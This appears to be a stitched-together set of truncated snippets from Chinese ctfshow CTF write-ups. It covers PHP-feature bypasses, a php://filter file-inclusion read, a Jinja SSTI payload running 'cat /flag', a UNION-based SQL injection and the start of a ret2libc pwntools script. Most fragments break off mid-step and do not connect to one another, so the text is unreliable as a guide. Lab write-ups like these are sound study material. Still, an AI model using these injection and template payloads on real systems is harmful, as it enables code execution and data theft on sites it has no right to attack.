最多爆破 16 次,我试了十几次,运气不行 web102 highlight_file(__FILE__);$v1=$_POST['v1'];$v2=$_GET['v2'];$v3=$_GET['v3'];$v4=is_numeric($v2) andis_numeric($v3);if($v4){$s=substr($v2,2);$str=call_user_func($v1,$s);echo$str;file_put_contents($v3,$str); }e...
web103:与 web102 没什么区别。 web104:PHP 特性之sha1(),弱等于==。 web105:PHP 特性之变量覆盖。 web106:PHP 特性之sha1(),弱等于==。 web107:PHP 特性之sha1(),弱等于==,parse_str()利用。 web108:PHP 特性之ereg()截断漏洞。 web109:PHP 特性之__toString()与类触发。 web110:FilesystemIter...
payload:(同时这个也适用Web109)?v1=FilesystemIterator&v2=getcwd相当于执行:eval("echo new FilesystemIterator(getcwd());");getcwd()返回当前工作目录路径,之后创建一个FilesystemIterator对象,该对象会遍历当前目录中的文件,这里就是输出当前目录中第一个文件的路径。
第一个参数$_SERVER[‘argv’][0]是脚本名,其余的是传递给脚本的参数 2.web网页模式下 在web页模式下必须在php.ini开启register_argc_argv配置项 设置register_argc_argv = On(默认是Off),重启服务,S E R V E R [ ‘ a r g v ’ ] 才会有效果这时候的 _SERVER[‘argv’]才会有效果 这时候的S...
web 32过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\( 这里考虑:利用文件包含以及伪协议读取?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php这里伪协议的意思是,php://filter(过滤器)/convert.base64-encode(base64编码的过滤器)/resource=flag....
ctfshow web入门php特性 回到顶部 php特性 web89 include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){$num=$_GET['num'];if(preg_match("/[0-9]/",$num)){die("no no no!"); }if(intval($num)){echo$flag;...
io.interactive() pwn25 frompwnimport*fromLibcSearcherimport*# 打印调试信息context.log_level ='debug'# 建立连接p = remote("pwn.challenge.ctf.show","28111") elf = ELF("./pwn")# 溢出偏移地址offset =0x84+0x4+0x4# main函数地址main_addr = elf.symbols['main']# plt表中puts函数地址puts_pl...
web362?name={{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}} 这里的x任意26个英文字母的任意组合都可以,同样可以得到__builtins__然后用eval就可以了。还可以用全角符号?name={{"".__class__.__bases__[0].__subclasses__()[132]....
得到flag:ctfshow{df6f1c62-9c0a-4024-8ef0-b137a612b108} 回到顶部 WEB90 include("flag.php"); highlight_file(__FILE__);if(isset($_GET['num'])){ $num= $_GET['num'];if($num==="4476"){ die("no no no!"); }if(intval($num,0)===4476){ ...
web171首先尝试1'--+,发现有返回值;说明直接闭合正确;接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来)查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_schema....